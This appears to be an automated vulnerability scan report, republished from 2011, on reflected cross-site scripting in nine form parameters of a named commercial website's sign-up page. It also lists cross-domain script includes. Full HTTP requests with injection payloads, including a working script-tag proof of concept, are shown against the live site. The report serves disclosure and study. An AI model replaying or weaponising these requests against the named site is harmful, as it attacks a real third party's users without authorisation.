XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, onespot.com

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 09 13:58:03 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. Cross-site scripting (reflected)

1.1. http://www.onespot.com/get-started/ [comments_or_questions parameter]

1.2. http://www.onespot.com/get-started/ [company parameter]

1.3. http://www.onespot.com/get-started/ [email parameter]

1.4. http://www.onespot.com/get-started/ [first_name parameter]

1.5. http://www.onespot.com/get-started/ [last_name parameter]

1.6. http://www.onespot.com/get-started/ [phone parameter]

1.7. http://www.onespot.com/get-started/ [site_url parameter]

1.8. http://www.onespot.com/get-started/ [title parameter]

1.9. http://www.onespot.com/get-started/ [traffic_per_month parameter]

2. Cross-domain script include

2.1. http://www.onespot.com/

2.2. http://www.onespot.com/contact-us/

2.3. http://www.onespot.com/customers/

2.4. http://www.onespot.com/get-started/

2.5. http://www.onespot.com/products/nextclick/

2.6. http://www.onespot.com/products/topic-pages/

2.7. http://www.onespot.com/publishers/

2.8. http://www.onespot.com/retailers/

2.9. http://www.onespot.com/technology/

3. Email addresses disclosed



1. Cross-site scripting (reflected)  next
There are 9 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.onespot.com/get-started/ [comments_or_questions parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onespot.com
Path:   /get-started/

Issue detail

The value of the comments_or_questions request parameter is copied into the HTML document as plain text between tags. The payload 5d746<script>alert(1)</script>5e701e284ea was submitted in the comments_or_questions parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /get-started/ HTTP/1.1
Host: www.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.onespot.com/get-started/
Cache-Control: max-age=0
Origin: http://www.onespot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=35039743.1304962795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=35039743.1135348204.1304962795.1304962795.1304962795.1; __utmc=35039743; __utmb=35039743.4.10.1304962795
Content-Length: 152

first_name=&last_name=&title=&company=&phone=&email=&site_url=&traffic_per_month=&comments_or_questions=5d746<script>alert(1)</script>5e701e284ea&lead_source=Web+%28Get+Started%29&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 17:42:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.onespot.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 11064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<met
...[SNIP]...
<textarea name="comments_or_questions" id="comments_or_questions">5d746<script>alert(1)</script>5e701e284ea</textarea>
...[SNIP]...

1.2. http://www.onespot.com/get-started/ [company parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.onespot.com
Path:   /get-started/

Issue detail

The value of the company request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d251c"%20a%3db%20376f642e5e3 was submitted in the company parameter. This input was echoed as d251c\" a=b 376f642e5e3 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /get-started/ HTTP/1.1
Host: www.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.onespot.com/get-started/
Cache-Control: max-age=0
Origin: http://www.onespot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=35039743.1304962795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=35039743.1135348204.1304962795.1304962795.1304962795.1; __utmc=35039743; __utmb=35039743.4.10.1304962795
Content-Length: 152

first_name=&last_name=&title=&company=d251c"%20a%3db%20376f642e5e3&phone=&email=&site_url=&traffic_per_month=&comments_or_questions=&lead_source=Web+%28Get+Started%29&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 17:41:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.onespot.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 11060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<met
...[SNIP]...
<input type="text" name="company" id="company" maxlength="255" value="d251c\" a=b 376f642e5e3" />
...[SNIP]...

1.3. http://www.onespot.com/get-started/ [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.onespot.com
Path:   /get-started/

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2b8e"%20a%3db%20e90d12bea50 was submitted in the email parameter. This input was echoed as d2b8e\" a=b e90d12bea50 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /get-started/ HTTP/1.1
Host: www.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.onespot.com/get-started/
Cache-Control: max-age=0
Origin: http://www.onespot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=35039743.1304962795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=35039743.1135348204.1304962795.1304962795.1304962795.1; __utmc=35039743; __utmb=35039743.4.10.1304962795
Content-Length: 152

first_name=&last_name=&title=&company=&phone=&email=d2b8e"%20a%3db%20e90d12bea50&site_url=&traffic_per_month=&comments_or_questions=&lead_source=Web+%28Get+Started%29&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 17:42:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.onespot.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 11062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<met
...[SNIP]...
<input type="text" name="email" id="email" maxlength="40" value="d2b8e\" a=b e90d12bea50" />
...[SNIP]...

1.4. http://www.onespot.com/get-started/ [first_name parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.onespot.com
Path:   /get-started/

Issue detail

The value of the first_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c870"%20a%3db%206d07e03fa01 was submitted in the first_name parameter. This input was echoed as 7c870\" a=b 6d07e03fa01 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /get-started/ HTTP/1.1
Host: www.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.onespot.com/get-started/
Cache-Control: max-age=0
Origin: http://www.onespot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=35039743.1304962795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=35039743.1135348204.1304962795.1304962795.1304962795.1; __utmc=35039743; __utmb=35039743.4.10.1304962795
Content-Length: 152

first_name=7c870"%20a%3db%206d07e03fa01&last_name=&title=&company=&phone=&email=&site_url=&traffic_per_month=&comments_or_questions=&lead_source=Web+%28Get+Started%29&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 17:41:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.onespot.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 11057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<met
...[SNIP]...
<input type="text" name="first_name" id="first_name" maxlength="40" value="7c870\" a=b 6d07e03fa01" />
...[SNIP]...

1.5. http://www.onespot.com/get-started/ [last_name parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.onespot.com
Path:   /get-started/

Issue detail

The value of the last_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fab29"%20a%3db%202ea86ea1b59 was submitted in the last_name parameter. This input was echoed as fab29\" a=b 2ea86ea1b59 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /get-started/ HTTP/1.1
Host: www.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.onespot.com/get-started/
Cache-Control: max-age=0
Origin: http://www.onespot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=35039743.1304962795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=35039743.1135348204.1304962795.1304962795.1304962795.1; __utmc=35039743; __utmb=35039743.4.10.1304962795
Content-Length: 152

first_name=&last_name=fab29"%20a%3db%202ea86ea1b59&title=&company=&phone=&email=&site_url=&traffic_per_month=&comments_or_questions=&lead_source=Web+%28Get+Started%29&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 17:41:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.onespot.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 11058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<met
...[SNIP]...
<input type="text" name="last_name" id="last_name" maxlength="80" value="fab29\" a=b 2ea86ea1b59" />
...[SNIP]...

1.6. http://www.onespot.com/get-started/ [phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.onespot.com
Path:   /get-started/

Issue detail

The value of the phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 267eb"%20a%3db%2048aceeddf83 was submitted in the phone parameter. This input was echoed as 267eb\" a=b 48aceeddf83 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /get-started/ HTTP/1.1
Host: www.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.onespot.com/get-started/
Cache-Control: max-age=0
Origin: http://www.onespot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=35039743.1304962795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=35039743.1135348204.1304962795.1304962795.1304962795.1; __utmc=35039743; __utmb=35039743.4.10.1304962795
Content-Length: 152

first_name=&last_name=&title=&company=&phone=267eb"%20a%3db%2048aceeddf83&email=&site_url=&traffic_per_month=&comments_or_questions=&lead_source=Web+%28Get+Started%29&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 17:42:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.onespot.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 11062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<met
...[SNIP]...
<input type="text" name="phone" id="phone" maxlength="40" value="267eb\" a=b 48aceeddf83" />
...[SNIP]...

1.7. http://www.onespot.com/get-started/ [site_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.onespot.com
Path:   /get-started/

Issue detail

The value of the site_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e56ae"%20a%3db%204a76d419125 was submitted in the site_url parameter. This input was echoed as e56ae\" a=b 4a76d419125 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /get-started/ HTTP/1.1
Host: www.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.onespot.com/get-started/
Cache-Control: max-age=0
Origin: http://www.onespot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=35039743.1304962795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=35039743.1135348204.1304962795.1304962795.1304962795.1; __utmc=35039743; __utmb=35039743.4.10.1304962795
Content-Length: 152

first_name=&last_name=&title=&company=&phone=&email=&site_url=e56ae"%20a%3db%204a76d419125&traffic_per_month=&comments_or_questions=&lead_source=Web+%28Get+Started%29&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 17:42:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.onespot.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 11059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<met
...[SNIP]...
<input type="text" name="site_url" id="site_url" maxlength="200" value="e56ae\" a=b 4a76d419125" />
...[SNIP]...

1.8. http://www.onespot.com/get-started/ [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.onespot.com
Path:   /get-started/

Issue detail

The value of the title request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79c28"%20a%3db%208f1a3f14af1 was submitted in the title parameter. This input was echoed as 79c28\" a=b 8f1a3f14af1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /get-started/ HTTP/1.1
Host: www.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.onespot.com/get-started/
Cache-Control: max-age=0
Origin: http://www.onespot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=35039743.1304962795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=35039743.1135348204.1304962795.1304962795.1304962795.1; __utmc=35039743; __utmb=35039743.4.10.1304962795
Content-Length: 152

first_name=&last_name=&title=79c28"%20a%3db%208f1a3f14af1&company=&phone=&email=&site_url=&traffic_per_month=&comments_or_questions=&lead_source=Web+%28Get+Started%29&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 17:41:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.onespot.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 11062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<met
...[SNIP]...
<input type="text" name="title" id="title" maxlength="80" value="79c28\" a=b 8f1a3f14af1" />
...[SNIP]...

1.9. http://www.onespot.com/get-started/ [traffic_per_month parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.onespot.com
Path:   /get-started/

Issue detail

The value of the traffic_per_month request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f3ef"%20a%3db%206cbb2ba310a was submitted in the traffic_per_month parameter. This input was echoed as 1f3ef\" a=b 6cbb2ba310a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /get-started/ HTTP/1.1
Host: www.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.onespot.com/get-started/
Cache-Control: max-age=0
Origin: http://www.onespot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=35039743.1304962795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=35039743.1135348204.1304962795.1304962795.1304962795.1; __utmc=35039743; __utmb=35039743.4.10.1304962795
Content-Length: 152

first_name=&last_name=&title=&company=&phone=&email=&site_url=&traffic_per_month=1f3ef"%20a%3db%206cbb2ba310a&comments_or_questions=&lead_source=Web+%28Get+Started%29&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 17:42:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.onespot.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 11050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<met
...[SNIP]...
<input type="text" name="traffic_per_month" id="traffic_per_month" maxlength="200" value="1f3ef\" a=b 6cbb2ba310a" />
...[SNIP]...

2. Cross-domain script include  previous  next
There are 9 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


2.1. http://www.onespot.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onespot.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.onespot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 17:39:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.onespot.com/xmlrpc.php
Content-Length: 13944
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<met
...[SNIP]...
<!-- jQuery & form JavaScript (begin) -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

2.2. http://www.onespot.com/contact-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onespot.com
Path:   /contact-us/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact-us/ HTTP/1.1
Host: www.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.onespot.com/customers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=35039743.1304967098.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; __utma=35039743.1135348204.1304962795.1304962795.1304967098.2; __utmc=35039743; __utmb=35039743.4.10.1304967098

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 18:53:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.onespot.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 12144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<met
...[SNIP]...
<!-- jQuery & form JavaScript (begin) -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

2.3. http://www.onespot.com/customers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onespot.com
Path:   /customers/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customers/ HTTP/1.1
Host: www.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.onespot.com/technology/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=35039743.1304962795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=35039743.1135348204.1304962795.1304962795.1304962795.1; __utmc=35039743; __utmb=35039743.6.10.1304962795

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 17:41:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.onespot.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 13882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<met
...[SNIP]...
<!-- jQuery & form JavaScript (begin) -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

2.4. http://www.onespot.com/get-started/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onespot.com
Path:   /get-started/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /get-started/ HTTP/1.1
Host: www.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.onespot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=35039743.1304962795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=35039743.1135348204.1304962795.1304962795.1304962795.1; __utmc=35039743; __utmb=35039743.2.10.1304962795

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 17:40:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.onespot.com/xmlrpc.php
Content-Length: 10514
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

